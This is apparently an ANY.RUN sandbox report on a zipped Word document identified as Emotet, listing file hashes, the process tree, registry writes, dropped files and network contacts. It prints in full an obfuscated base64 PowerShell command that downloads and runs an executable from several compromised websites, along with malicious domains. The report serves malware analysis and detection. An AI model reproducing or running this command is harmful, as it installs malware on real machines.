File name: | 349d13ca99ab03869548d75b99e5a1d0.zip |
Full analysis: | https://app.any.run/tasks/0ecee25b-c0e6-4466-83ca-5de99ffe3313 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 05, 2022, 18:20:06 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 5BB85FC60688E2EEAAE5F2C0D4DAAB64 |
SHA1: | D5C8CBC513D92CCF5FE4E2FF836CCB6A05FA097B |
SHA256: | E26B12859CE5D6654399EC144BA5196FA97BC04CF36D6ED3881501A9478B0338 |
SSDEEP: | 1536:4CpkVTh0GSnrjdqD8z9DogHmO6Sxwo5AlaJoOtKp:4dljE/dm8xDOmxD5AoJoOtq |
.zip | | | ZIP compressed archive (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2056 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\349d13ca99ab03869548d75b99e5a1d0.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | Explorer.EXE |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.91.0 | ||||
3140 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb2056.40102\1word.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3804 | powershell -e JABNADYAaABxADkAcAA1AD0AKAAoACcAUQAnACsAJwB0AHgAJwApACsAKAAnAGQAegBzACcAKwAnAGgAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdABlACcAKwAnAG0AJwApACAAJABlAE4AVgA6AHUAcwBlAFIAcABSAE8AZgBJAEwAZQBcAHMAcQBQAGcARABmAGkAXABkAFEASwBHAHAAdwBDAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQASQByAEUAYwB0AG8AcgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBgAGMAVQBSAGkAYABUAFkAUAByAG8AdABgAE8AQwBPAEwAIgAgAD0AIAAoACgAJwB0AGwAJwArACcAcwAxADIALAAnACsAJwAgACcAKQArACcAdAAnACsAKAAnAGwAcwAnACsAJwAxACcAKQArACgAJwAxACwAJwArACcAIAB0AGwAcwAnACkAKQA7ACQAUQBmAGkAZgBvAHYANwAgAD0AIAAoACgAJwBFACcAKwAnADIAOQAzADcAJwApACsAJwBhACcAKwAnADQAeQAnACkAOwAkAEUAZABnAHYAMwA4AGIAPQAoACgAJwBNAHkAdQAnACsAJwBuACcAKQArACcAcQAnACsAJwB3AGwAJwApADsAJABWAGwAeABpAHcANgA5AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHkAJwArACcAQQBwACcAKwAnAFMAJwArACgAJwBxACcAKwAnAHAAZwBkACcAKQArACgAJwBmAGkAeQBBACcAKwAnAHAARAAnACkAKwAnAHEAJwArACgAJwBrACcAKwAnAGcAcAB3AGMAeQBBACcAKQArACcAcAAnACkALQBDAFIARQBwAGwAYQBDAEUAIAAoACcAeQBBACcAKwAnAHAAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKwAkAFEAZgBpAGYAbwB2ADcAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFUAdAB1AHQAZQAzAHcAPQAoACgAJwBTAF8AJwArACcAegB5AGsAJwApACsAJwA3AHIAJwApADsAJABCAHkAMQBiADIAdgB4AD0AJgAoACcAbgAnACsAJwBlACcAKwAnAHcALQBvAGIAagBlAGMAdAAnACkAIABuAGUAVAAuAHcARQBiAGMATABpAEUATgB0ADsAJABNAHYANQBrAGkAOAB5AD0AKAAoACcAaAAnACsAJwB0AHQAcAAnACsAJwA6AC8AJwApACsAJwAvACcAKwAoACcAZgBvAHIAdAAnACsAJwBjACcAKQArACgAJwBvAGwAbAAnACsAJwBpAG4AJwApACsAKAAnAHMAYQAnACsAJwB0AGgAbAAnACkAKwAoACcAZQAnACsAJwB0AGUAZgAnACkAKwAnAGEAYwAnACsAJwB0ACcAKwAnAG8AJwArACcAcgB5ACcAKwAnAC4AYwAnACsAJwBvAG0AJwArACgAJwAvAHcAcAAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvAGkALwAnACkAKwAoACcAKgBoACcAKwAnAHQAdAAnACkAKwAnAHAAOgAnACsAJwAvACcAKwAnAC8AJwArACcAZwAnACsAJwBlAHQAJwArACcAbQAnACsAKAAnAGkAJwArACcAbgBnAC4AYwAnACkAKwAnAG8AbQAnACsAJwAvACcAKwAnAGYAbwAnACsAJwByAHUAJwArACcAbQAvACcAKwAoACcAcAAnACsAJwAvACoAaAAnACkAKwAnAHQAJwArACgAJwB0AHAAOgAvAC8AJwArACcAZwAnACkAKwAnAGEAZgAnACsAJwBmACcAKwAoACcAYQAtACcAKwAnAG0AdQAnACkAKwAoACcAcwAnACsAJwBpAGMALgAnACkAKwAoACcAYwBvACcAKwAnAG0ALwBjACcAKQArACgAJwBnAGkALQAnACsAJwBiAGkAJwApACsAJwBuACcAKwAnAC8AJwArACgAJwBVAE0AJwArACcALwAnACkAKwAoACcAKgBoAHQAdAAnACsAJwBwACcAKQArACcAOgAvACcAKwAnAC8AZgAnACsAKAAnAHIAYQBuACcAKwAnAGsAJwArACcAZgB1AHIAJwApACsAJwB0AGUAJwArACgAJwBsAGYAJwArACcAYQAnACkAKwAoACcAcgAnACsAJwBvAGwAJwArACcAaQAnACsAJwBsAGwAbwAnACsAJwAuAGMAbwBtAC8AbABhAHMAJwApACsAKAAnAGUAJwArACcAdQAvAGMANwAnACsAJwAvACcAKQArACcAKgAnACsAKAAnAGgAdAB0ACcAKwAnAHAAJwArACcAOgAvAC8AZQB2AGkAbABuAGUAcgBkACcAKQArACcALgBvACcAKwAnAHIAZwAnACsAKAAnAC8AYwBnAGkALQAnACsAJwBiACcAKQArACgAJwBpAG4AJwArACcALwBuAFUAJwApACsAKAAnAGkAJwArACcALwAqAGgAJwApACsAJwB0ACcAKwAnAHQAJwArACgAJwBwACcAKwAnADoALwAnACkAKwAoACcALwBnAGEAJwArACcAcAAnACkAKwAnAGUAJwArACcAcwBtACcAKwAoACcAbQAuAG8AcgAnACsAJwBnAC8AbwAnACkAKwAoACcAbAAnACsAJwBkAC8AJwArACcATQAvACoAaAB0ACcAKQArACcAdABwACcAKwAnADoALwAnACsAKAAnAC8AJwArACcAZwByACcAKQArACgAJwBtACcAKwAnAGwAJwArACcALgBuAGUAdAAnACkAKwAoACcALwB3ACcAKwAnAHAAJwApACsAKAAnAC8AQwAnACsAJwAvACcAKQApAC4AIgBzAFAATABgAEkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAE8AbgAzAGwAeQBjADcAPQAoACgAJwBQACcAKwAnAGEAaAAnACkAKwAnADYAeQAnACsAJwBoADEAJwApADsAZgBvAHIAZQBhAGMAaAAoACQARABjAGsAeQBpAGwAZwAgAGkAbgAgACQATQB2ADUAawBpADgAeQApAHsAdAByAHkAewAkAEIAeQAxAGIAMgB2AHgALgAiAGQATwBXAGAATgBgAEwAbwBhAGQAZgBJAGwARQAiACgAJABEAGMAawB5AGkAbABnACwAIAAkAFYAbAB4AGkAdwA2ADkAKQA7ACQAUQBmAGQAcwBpAGYAMAA9ACgAKAAnAE0AJwArACcAMAA2ACcAKQArACcAMwBpACcAKwAnAG4ANAAnACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAVgBsAHgAaQB3ADYAOQApAC4AIgBsAEUATgBgAGcAdABoACIAIAAtAGcAZQAgADMAMgAyADUANAApACAAewAmACgAJwBJAG4AdgBvACcAKwAnAGsAJwArACcAZQAnACsAJwAtAEkAdABlAG0AJwApACgAJABWAGwAeABpAHcANgA5ACkAOwAkAE4ANQBkADYAXwAwAHoAPQAoACgAJwBZADgAJwArACcAZQAnACkAKwAnAHYAJwArACgAJwAyAHUAJwArACcAdAAnACkAKQA7AGIAcgBlAGEAawA7ACQATwBiAGYAMwAwADUAbwA9ACgAKAAnAEoANQAxACcAKwAnAGkAJwApACsAJwBkACcAKwAnAG8AaQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFAAeQBmAG4AeABrAHgAPQAoACgAJwBLADYAawBpADUAJwArACcANQAnACkAKwAnADIAJwApAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) |
(PID) Process: | (2056) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
Operation: | write | Name: | ShellExtBMP |
Value: | |||
(PID) Process: | (2056) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
Operation: | write | Name: | ShellExtIcon |
Value: | |||
(PID) Process: | (2056) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\16D\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US | |||
(PID) Process: | (2056) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip | |||
(PID) Process: | (2056) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip | |||
(PID) Process: | (2056) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\349d13ca99ab03869548d75b99e5a1d0.zip | |||
(PID) Process: | (2056) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
Operation: | write | Name: | name |
Value: 120 | |||
(PID) Process: | (2056) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
Operation: | write | Name: | size |
Value: 80 | |||
(PID) Process: | (2056) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
Operation: | write | Name: | type |
Value: 120 | |||
(PID) Process: | (2056) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
Operation: | write | Name: | mtime |
Value: 100 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3140 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR1CB0.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3804 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:D3C284009A5790C3AA90D7C5D620CA65 | SHA256:6C12FFF497059706D50431BB47C624FA24A8A7F9B6D52B2AB251FDC588E00E39 | |||
3140 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:5139BA3BA1B06605FF1F573A0ADE294E | SHA256:0FB5A9E1C60D53E961D40F1E0C3C5ACA6CF8622ED86177AD84EBFA671D613D3E | |||
3140 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFC1FCDD9362145BF2.TMP | binary | |
MD5:56A612884A4FA7517F02D1F68318537A | SHA256:2EC25C12F457E3FCD907AAD1B18B4F5BD80EFEDDFDCC28C3BB4A5A58C2AEF350 | |||
3140 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIb2056.40102\~$1word.doc | pgc | |
MD5:9D2B12E17BCA686DBE2BAE27E96EC990 | SHA256:B7CE40807B7FE59168CBE6D4F9006B816BE4310E067A0C177E546B9822E1EB1C | |||
3140 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:26412112D1E0FCDF22FA75BBA2E6A528 | SHA256:F4AA7B84BB2FC8480BC0A90EE2E5C72AB7A4900C7FC7ECBFBE22CE350FE7A584 | |||
3804 | powershell.exe | C:\Users\admin\AppData\Local\Temp\yapj5jpi.ksp.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3804 | powershell.exe | C:\Users\admin\AppData\Local\Temp\ykmd5xgp.ugq.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
2056 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb2056.40102\1word.doc | document | |
MD5:349D13CA99AB03869548D75B99E5A1D0 | SHA256:D34849E1C97F9E615B3A9B800CA1F11ED04A92B1014F55AA0158E3FFFC22D78F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3804 | powershell.exe | GET | — | 34.102.136.180:80 | http://fortcollinsathletefactory.com/wp-admin/i/ | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3804 | powershell.exe | 34.102.136.180:80 | fortcollinsathletefactory.com | GOOGLE-CLOUD-PLATFORM | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
fortcollinsathletefactory.com |
| malicious |